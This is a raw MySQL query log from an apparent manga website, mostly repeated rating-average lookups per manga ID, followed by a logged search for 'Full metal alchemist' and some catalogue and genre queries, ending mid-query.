330638676 Quit 330638677 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638677 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330638677 Quit 330638678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638678 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330638678 Quit 330638679 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638679 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330638679 Quit 330638680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638680 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330638680 Quit 330638681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638681 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330638681 Quit 330638682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638682 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330638682 Quit 330638683 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638683 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330638683 Quit 330638684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638684 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330638684 Quit 330638685 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638685 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330638685 Quit 330638686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638686 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330638686 Quit 330638687 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638687 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330638687 Quit 330638688 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638688 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330638688 Quit 330638689 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638689 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330638689 Quit 330638690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638690 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330638690 Quit 330638691 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638691 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330638691 Quit 330638692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638692 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330638692 Quit 330638693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638693 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330638693 Quit 330638694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638694 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330638694 Quit 330638695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638695 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330638695 Quit 330638696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638696 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330638696 Quit 330638697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638697 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330638697 Quit 330638698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638698 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330638698 Quit 330638699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638699 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330638699 Quit 330638700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638700 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330638700 Quit 330638701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638701 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330638701 Quit 330638702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638702 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330638702 Quit 330638703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638703 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330638703 Quit 330638704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638704 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330638704 Quit 330638705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638705 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330638705 Quit 330638706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638706 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330638706 Quit 330638707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638707 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330638707 Quit 330638708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638708 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330638708 Quit 330638709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638709 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330638709 Quit 330638710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638710 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330638710 Quit 330638711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638711 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330638711 Quit 330638712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638712 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330638712 Quit 330638713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638713 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330638713 Quit 330638714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638714 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330638714 Quit 330638715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638715 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330638715 Quit 330638716 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638716 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330638716 Quit 330638717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638717 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330638717 Quit 330638718 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638718 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330638718 Quit 330638719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638719 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330638719 Quit 330638720 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330638720 Quit 330638721 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638721 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330638721 Quit 330638722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330638722 Quit 330638723 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638723 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330638723 Quit 330638724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638724 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330638724 Quit 330638725 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638725 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330638725 Quit 330638726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330638726 Quit 330638727 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638727 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330638727 Quit 330638728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330638728 Quit 330638729 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638729 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330638729 Quit 330638730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330638730 Quit 330638731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638731 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330638731 Quit 330638732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330638732 Quit 330638733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638733 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330638733 Quit 330638734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330638734 Quit 330638735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638735 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330638735 Quit 330638736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330638736 Quit 330638737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638737 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330638737 Quit 330638738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330638738 Quit 330638739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638739 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330638739 Quit 330638740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330638740 Quit 330638741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330638741 Quit 330638742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330638742 Quit 330638743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330638743 Quit 330638744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330638744 Quit 330638745 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330638745 Quit 330638746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330638746 Quit 330638747 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330638747 Quit 330638748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330638748 Quit 330638749 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330638749 Quit 330638750 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330638750 Quit 330638751 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330638751 Quit 330638752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330638752 Quit 330638753 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638753 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330638753 Quit 330638754 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330638754 Quit 330638755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638755 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330638755 Quit 330638756 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330638756 Quit 330638757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638757 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330638757 Quit 330638758 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330638758 Quit 330638759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330638759 Quit 330638760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330638760 Quit 330638761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330638761 Quit 330638762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330638762 Quit 330638763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330638763 Quit 330638764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638764 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330638764 Quit 330638765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330638765 Quit 330638766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330638766 Quit 330638767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330638767 Quit 330638768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330638768 Quit 330638769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330638769 Quit 330638770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330638770 Quit 330638771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330638771 Quit 330638772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330638772 Quit 330638773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330638773 Quit 330638774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330638774 Quit 330638775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330638775 Quit 330638776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330638776 Quit 330638777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330638777 Quit 330638778 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330638778 Quit 330638779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330638779 Quit 330638780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330638780 Quit 330638781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330638781 Quit 330638782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330638782 Quit 330638783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330638783 Quit 330638784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330638784 Quit 330638785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330638785 Quit 330638786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330638786 Quit 330638787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330638787 Quit 330638788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330638788 Quit 330638789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330638789 Quit 330638790 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638790 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330638790 Quit 330638791 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638791 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330638791 Quit 330638792 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638792 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330638792 Quit 330638793 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638793 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330638793 Quit 330638794 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638794 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330638794 Quit 330638795 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638795 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330638795 Quit 330638796 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638796 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330638796 Quit 330638797 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638797 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330638797 Quit 330638798 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638798 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330638798 Quit 330638799 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638799 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330638799 Quit 330638800 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638800 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330638800 Quit 330638801 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638801 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330638801 Quit 330638802 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638802 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330638802 Quit 330638803 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638803 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330638803 Quit 330638804 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638804 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330638804 Quit 330638805 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330638805 Quit 330638806 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330638806 Quit 330638807 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330638807 Quit 330638808 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330638808 Quit 330638809 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330638809 Quit 330638810 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330638810 Quit 330638811 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330638811 Quit 330638812 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330638812 Quit 330638813 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330638813 Quit 330638814 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330638814 Quit 330638815 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330638815 Quit 330638816 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330638816 Quit 330638817 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330638817 Quit 330638818 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330638818 Quit 330638819 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330638819 Quit 330638820 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330638820 Quit 330638821 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330638821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330638821 Quit 260225 19:27:59 330638822 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638823 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638823 Query INSERT INTO search_keywords (keyword, ip, created) VALUES ('Full metal alchemist', '205.202.98.251', '2026-02-26 03:27:59') 330638822 Quit 330638823 Quit 330638824 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638824 Query select k.* from (select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.title like '%Full metal alchemist%') as k where latest_chapter_id > 0 330638824 Quit 330638825 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638825 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.active = 1 AND REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'Full metal alchemist' 330638825 Quit 330638826 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638826 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id AND m.active = 1) AND (m.genres like '%%') group by manga_id ORDER BY sum(view) DESC 330638826 Quit 330638827 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638828 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330638827 Quit 330638828 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) 